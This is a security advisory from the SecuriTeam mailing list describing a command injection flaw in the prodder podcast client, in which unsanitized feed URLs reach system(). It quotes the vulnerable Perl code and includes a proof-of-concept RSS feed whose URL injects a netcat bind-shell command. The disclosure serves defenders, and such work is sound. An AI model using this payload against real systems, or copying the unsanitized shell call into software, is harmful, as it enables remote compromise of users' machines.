[UNIX] Prodder Arbitrary Command Execution

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -



Prodder Arbitrary Command Execution
------------------------------------------------------------------------


SUMMARY

<http://prodder.sourceforge.net/> Prodder is a command-line based Podcast
client written in Perl that runs on just about any Unix system. It
implements a few useful features that are lacking in many of the existing
tools, while remaining simple and light-weight.

A security flaw discovered in prodder makes it possible for a malicious
podcast server to remotely execute arbitrary shell commands on the
victim's client.

DETAILS

Vulnerable Systems:
* prodder versions 0.4 and prior.

Immune Systems:
* prodder version 0.5

Podcasting is the distribution of multimedia files over the internet.
Normally, a server is providing an RSS or Atom XML feed describing where
to get the multimedia files. The client parses the feed and may then
download the desired files.

When prodder is used to fetch a podcast, prodder will extract the URL of
the audio-file from the XML-file the server provides. Prodder then uses
Wget to fetch the file.

The source code looks as follows:
[...]
446 # Actually get the file
447 my $wget_cmd = "wget -qc -a '$conf{'errorfile'}' "
448 . "--tries=3 --timeout=20 --random-wait '$enc_url' -P '$outdir'";
449
450 # Background the wgets if needed - this will assume
451 # the downloads dont fail (once they've started)
452 $wget_cmd .= " --background" if $conf{'background'};
453
454
455
456 print "Fetching item ($enc_url)... ";
457 if (! system($wget_cmd))
[...]

Unfortunately, $enc_url which holds the URL in line 448 is never properly
sanitized, so it is possible to include arbitrary shell commands in the
URL which will then be executed using system() (see line 457).


Proof of Concept:
A minimal malicious server rss feed may look as follows:

<?xml version="1.0" encoding="UTF-8"?>
<?xml-style*** type="text/xsl"?>
<rss version="2.0">
<channel>
<title>RedTeam Pentesting Example Malicious Server Feed</title>
<item>
<enclosure url="http://www.example.com/example.mp3'; nc -e /bin/sh
-l -p 1337 & ';#'" length="241734" type="audio/mpeg" />
</item>
</channel>
</rss>

The URL above will open port 1337 via netcat on the victim's computer and
bind a shell to it. This is just one example of how to exploit the
vulnerability, as arbitrary commands can be included in the URL, but it
should illustrate the point.

Workaround:
Do not use prodder with untrusted servers.

Fix:
Upgrade to prodder-0.5, you can download it
<http://prdownloads.sourceforge.net/prodder/prodder-0.5.tgz?download>
here.

Disclosure Timeline:
* 2006-05-18 Discovery of the problem
* 2006-05-19 Notification of the author
* 2006-05-19 Initial response of the author
* 2006-05-20 Fixed version of prodder is released
* 2005-05-22 Public release of the advisory without CVE number because of
public release by the author. CVE will be appended when available.


ADDITIONAL INFORMATION

The original article can be found at:
<http://www.redteam-pentesting.de/advisories/rt-sa-2006-002.txt>
http://www.redteam-pentesting.de/advisories/rt-sa-2006-002.txt



========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.